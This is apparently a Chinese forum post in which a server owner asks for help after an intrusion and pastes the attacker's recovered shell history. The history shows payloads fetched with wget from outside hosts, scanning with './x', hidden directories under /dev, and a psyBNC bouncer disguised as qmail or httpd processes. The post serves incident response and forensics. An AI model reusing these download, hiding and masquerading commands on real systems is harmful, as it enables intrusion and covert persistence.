系统被入侵，帮帮忙阿！！！非常急！！！关键字：psybnc

dingzhener

系统是redHat 9，自己编译的内核 2.4.27 ，装了apche、mysql、php、proftp、qmail。

今天早上登录系统，查看系统日志，发现/var/log/ 下面被删了个干净，
再查看history 发现下面的内容
   2  cd /dev/.man
    3  cd /dev/ida/.man
    4  wget www.warrlop.0catch.com/a.tgz
    5  wget 209.63.57.10/a.tgz
    6  ftp
    7  ps x
    8  wget www.rossi25.go.ro/xx.tgz
    9  tar xzvf xx.tgz
   10  rm -rf xx.tgz
   11  cd .sh
   12  ls
   13  ./x 65.35
   14  ./x 216.48
   15  ./x 216.49
   16  exit
   17  cd /var/tmp'ls -a
   18  cd /var/tmp;ls -a
   19  cd /var/dev
   20  cd /dev
   21  mkdir "."
   22  mkdir " "
   23  cd " "
   24  wget iceghost.go.ro/b.tar.gz
   25  RM -RF no_user.phtml
   26  rm -rf no_user.phtml
   27  wget geocities.com/kiaxk/b.tar.gz
   28  wget http://www.psychoid.net/psyBNC2.3.1.tar.gz
   29  tar zxvf psyBNC2.3.1.tar.gz
   30  rm -rf psyBNC2.3.1.tar.gz
   31  mv psybnc html
   32  cd html
   33  ls -a
   34  ps -ax
   35  mv psybnc [httpd <defunct>;]
   36   mv psybnc "[httpd <defunct>;]"
   37  mv psybnc "qmail-clean"
   38  ls -a
   39  make
   40  ps -ax
   41  mv psybnc "/var/qmail/bin/qmail-queue"
   42  mv psybnc "qmail-clean"
   43  PATHATH
   44  PATH=ATH
   45  "qmail-clean"
   46  uname -a
   47  id

platinum

http://bbs.chinaunix.net/forum/viewtopic.php?t=622982&show_type=